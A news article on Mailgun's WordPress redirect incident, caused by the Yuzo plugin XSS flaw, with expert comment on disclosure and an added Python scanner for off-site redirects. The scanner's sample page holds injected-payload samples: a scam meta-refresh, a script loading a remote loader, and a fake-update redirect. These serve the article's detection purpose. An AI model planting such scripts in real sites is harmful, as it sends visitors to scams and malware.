Email automation and delivery service Mailgun announced that it has resolved a security incident that resulted from a massive coordinated attack against WordPress sites.
“The mailgun.com webpage began issuing redirects to sites outside of our domain. We immediately launched an incident to determine the source of the redirects and determined that a plugin for WordPress was responsible for issuing the redirects. We've disabled the plugin responsible for this issue,” the security incident notice said.
“Our applications including the Mailgun Dashboard, APIs, and customer data stored on our platform were not impacted by this issue.”
In a massive attack on WordPress sites, bad actors exploited a cross-site scripting (XSS) vulnerability in the Yuzo Related Posts WordPress plugin to inject JavaScript that redirected visitors to malicious tech support scams, spam ad pages, malware-laden software updates and more.
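The symptom Mailgun reported (its own pages issuing redirects to hosts outside its domain) is something a site operator can check for directly in the HTML the site serves. The script below is an added illustration, not Mailgun's code nor anything from the Yuzo plugin or its author. It scans a page for the redirect carriers typically planted by stored-XSS campaigns of this kind: `<meta http-equiv="refresh">` tags, external `<script src>` references, and inline script that assigns `location` or embeds absolute URLs, and reports any that point outside the site's own domain. The site domain `site.example`, the sample page and every hostname in it are constructed for the example.

```python
"""Flag off-site redirects and script loads in a served WordPress page.

Added example (not Mailgun's or the plugin author's code). Run it against the
HTML a site actually returns and compare the findings to a known-good baseline.
"""
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Assignments to location / location.href, or calls to location.replace/assign,
# with a quoted string target. (Assumed pattern; obfuscated JS will not match.)
_JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.|top\.)?location"""
    r"""(?:\.href\s*=|\.replace\s*\(|\.assign\s*\(|\s*=)\s*['"]([^'"]+)['"]""",
    re.IGNORECASE,
)
# Any quoted absolute or scheme-relative URL literal inside inline script.
_URL_LITERAL = re.compile(r"""['"]((?:https?:)?//[^'"\s]+)['"]""", re.IGNORECASE)
# The url= part of a <meta http-equiv="refresh" content="0;url=..."> tag.
_META_URL = re.compile(r"""url\s*=\s*['"]?([^'"\s;]+)""", re.IGNORECASE)


class RedirectScanner(HTMLParser):
    """Collects (kind, url) pairs for every off-site redirect or script load."""

    def __init__(self, site_domain: str):
        super().__init__()
        self.site_domain = site_domain.lower()
        self.findings: List[Tuple[str, str]] = []
        self._in_script = False
        self._script_buf: List[str] = []

    def _is_same_site(self, url: str) -> bool:
        host = urlparse(url.strip()).hostname  # None for relative URLs
        if host is None:
            return True  # relative target: stays on this site
        return host == self.site_domain or host.endswith("." + self.site_domain)

    def _check(self, kind: str, url: str) -> None:
        if not self._is_same_site(url):
            self.findings.append((kind, url.strip()))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_URL.search(a.get("content") or "")
            if m:
                self._check("meta-refresh", m.group(1))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []
            if a.get("src"):
                self._check("script-src", a["src"])

    def handle_data(self, data):
        if self._in_script:  # HTMLParser delivers <script> bodies as data
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            seen = set()
            for m in _JS_REDIRECT.finditer(body):
                seen.add(m.group(1))
                self._check("js-redirect", m.group(1))
            for m in _URL_LITERAL.finditer(body):
                if m.group(1) not in seen:
                    self._check("js-url", m.group(1))


def find_offsite_redirects(html: str, site_domain: str) -> List[Tuple[str, str]]:
    """Return every off-site redirect/script reference found in the page."""
    scanner = RedirectScanner(site_domain)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one legitimate CDN script plus three injected items.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<meta http-equiv="refresh" content="0;url=http://tech-support-scam.example/alert">
<script src="https://cdn.site.example/app.js"></script>
<script>
  // injected: pulls a second-stage loader from an attacker-controlled host
  var s = document.createElement('script');
  s.src = 'https://ads.spam.example/r.js';
</script>
<script>window.location = "https://update-your-flash.example/dl";</script>
</head><body>
<a href="/blog">Blog</a>
<script>if (!document.cookie) { location.href = "/login"; }</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, url in find_offsite_redirects(SAMPLE_PAGE, "site.example"):
        print(f"{kind:13s} {url}")
```

The check is a symptom detector, not a fix: it catches plain-text redirects like the ones in this campaign but not base64- or hex-obfuscated loaders, and a clean result says nothing about whether the vulnerable plugin is still installed. Keeping plugins patched remains the control that actually removes the exposure.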
“While unfortunate, this is not new and will be a problem that always persists,” said Chris Morales, head of security analytics at Vectra. “The best advice I can give at this time is that users need to pay careful attention to the sites they do visit at any given time and be careful what information they are providing.”
The problem with the Yuzo plugin was reportedly worsened because the web developer who discovered the vulnerability published proof-of-concept code rather than reporting the issue to the plugin author, who has since posted that he will soon release an improved version of the plugin for all users.
“Vulnerabilities in WordPress plugins have been a long-standing problem. The plug-in directory is very much like the Google Play store, where vetting of apps is a major weakness,” said Chris Orr, systems engineer at Tripwire.
“Lack of notification by the plug-in developer is also an issue to contend with. It is recommended that WordPress users either automatically update the platform and their apps or pay close attention to the ones they use and how they behave and keep an eye out for vulnerabilities.”
Notification from the developer, though, was somewhat complicated by the lack of care taken to properly disclose the vulnerability, according to Oscar Tovar, application security specialist at WhiteHat Security.
“Proper, responsible vulnerability disclosures are something that should be carried out with the utmost care. The failure to do so can have widespread and serious repercussions. In this case, it was unfortunate that the zero-day was released to the public instead of the plugin author. If the author had been alerted with the vulnerability’s proof of concept, things would have played out completely differently.
“This incident can serve as a valuable example of how serious publishing a zero-day into the wild can be and hopefully prevent the same error from happening again in the future. The risks of deviating from a responsible disclosure are simply too great.”